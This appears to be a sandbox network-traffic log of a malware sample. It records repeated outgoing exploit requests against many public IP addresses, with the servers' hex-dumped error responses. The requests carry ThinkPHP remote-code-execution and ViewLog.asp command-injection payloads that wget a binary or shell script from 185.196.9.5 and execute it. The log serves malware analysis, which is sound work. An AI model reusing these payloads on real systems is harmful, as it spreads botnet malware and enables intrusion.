Feb 25, 2024 19:02:54.122364044 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
172	192.168.2.15	60552	95.164.195.191	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:54.220900059 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:54.319492102 CET	495	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:02:54 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 301 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 31 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.52 (Ubuntu) Server at 127.0.1.1 Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
173	192.168.2.15	37150	95.217.157.9	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:54.321187973 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:54.517157078 CET	496	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:02:54 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 302 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 63 61 72 64 61 6e 6f 2e 73 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.41 (Ubuntu) Server at cardano.se Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
174	192.168.2.15	42556	95.173.181.239	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:54.351845026 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:54.579756975 CET	502	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Sun, 25 Feb 2024 18:02:53 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
175	192.168.2.15	59322	95.101.49.14	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:54.452491045 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:54.768553019 CET	477	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 255 Expires: Sun, 25 Feb 2024 18:02:54 GMT Date: Sun, 25 Feb 2024 18:02:54 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 35 35 66 35 37 34 36 38 26 23 34 36 3b 31 37 30 38 38 38 34 31 37 34 26 23 34 36 3b 39 62 63 35 36 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.55f57468.1708884174.9bc56</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
176	192.168.2.15	51860	94.121.207.149	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:54.736249924 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
177	192.168.2.15	53914	94.121.32.107	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:54.736354113 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
178	192.168.2.15	60592	95.164.195.191	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:54.865097046 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:54.964268923 CET	495	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:02:54 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 301 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 31 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.52 (Ubuntu) Server at 127.0.1.1 Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
179	192.168.2.15	58718	62.72.36.13	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:54.905141115 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:02:55.077806950 CET	207	IN	HTTP/1.1 404 Not Found Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Sun, 25 Feb 2024 18:02:54 GMT Content-Length: 19 Connection: close Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found

Session ID	Source IP	Source Port	Destination IP	Destination Port
180	192.168.2.15	48334	62.29.43.48	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:54.957422018 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
181	192.168.2.15	52972	94.120.35.83	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:54.957544088 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
182	192.168.2.15	55088	94.121.22.248	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:54.965600014 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
183	192.168.2.15	40512	95.52.78.184	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:54.970495939 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
184	192.168.2.15	42138	95.68.32.7	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:54.981477976 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:55.484334946 CET	64	IN	HTTP/1.1 400 Bad Request Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port
185	192.168.2.15	48906	95.86.127.86	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:54.991689920 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
186	192.168.2.15	60208	95.86.90.178	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:55.139600039 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
187	192.168.2.15	43694	95.164.197.80	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:57.345773935 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:57.444382906 CET	495	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:02:57 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 301 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 31 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.52 (Ubuntu) Server at 127.0.1.1 Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
188	192.168.2.15	45122	95.163.199.7	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:57.393445015 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:57.550967932 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sun, 25 Feb 2024 18:02:57 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
189	192.168.2.15	42614	95.101.252.251	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:57.428738117 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:57.609149933 CET	479	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Sun, 25 Feb 2024 18:02:57 GMT Date: Sun, 25 Feb 2024 18:02:57 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 63 33 66 36 35 35 66 26 23 34 36 3b 31 37 30 38 38 38 34 31 37 37 26 23 34 36 3b 34 38 37 35 63 32 66 32 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.c3f655f.1708884177.4875c2f2</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
190	192.168.2.15	50410	95.216.195.75	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:57.443363905 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:57.639746904 CET	502	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:02:57 GMT Server: Apache/2.4.38 (Debian) Content-Length: 308 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 65 62 2e 6f 70 74 6f 2d 63 6f 70 79 2e 64 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad 